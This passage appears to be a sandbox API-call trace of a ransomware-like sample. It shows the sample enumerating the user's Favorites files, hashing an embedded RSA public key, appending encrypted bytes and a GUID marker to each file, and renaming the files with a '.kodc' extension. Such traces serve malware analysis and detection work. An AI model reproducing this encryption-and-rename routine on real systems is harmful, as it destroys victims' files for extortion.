[0101.373] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0101.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.373] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0101.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0101.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce270 | out: hHeap=0x630000) returned 1 [0101.373] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0101.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.374] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=236) returned 1 [0101.374] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.377] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.377] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.378] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.378] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xec, lpOverlapped=0x0) returned 1 [0101.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.379] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.379] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.379] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.380] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.380] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.380] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.380] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.380] GetLastError () returned 0x0 [0101.380] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.380] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.380] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.380] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.380] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.380] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.381] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.381] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.381] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.382] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.382] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.382] CloseHandle (hObject=0x5cc) returned 1 [0101.383] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.kodc")) returned 1 [0101.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.383] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.385] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0101.385] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0101.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.385] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=226) returned 1 [0101.385] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.388] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.388] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.389] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.389] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe2, lpOverlapped=0x0) returned 1 [0101.389] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.389] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.389] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.389] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.390] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.390] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.390] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.390] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.390] GetLastError () returned 0x0 [0101.390] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.390] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.391] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.391] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.391] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.391] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.391] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.391] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.395] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.395] CloseHandle (hObject=0x5cc) returned 1 [0101.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e268 [0101.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.kodc")) returned 1 [0101.399] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0101.399] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.399] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.399] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.399] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0101.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5e48 [0101.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5e48 | out: hHeap=0x630000) returned 1 [0101.400] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.400] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.400] PathFindFileNameW (pszPath="") returned="" [0101.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.401] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.401] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0101.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0101.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.401] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0101.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.401] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.401] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.405] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.405] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.406] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.406] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.406] lstrlenA (lpString="-----BEGIN PUBLIC 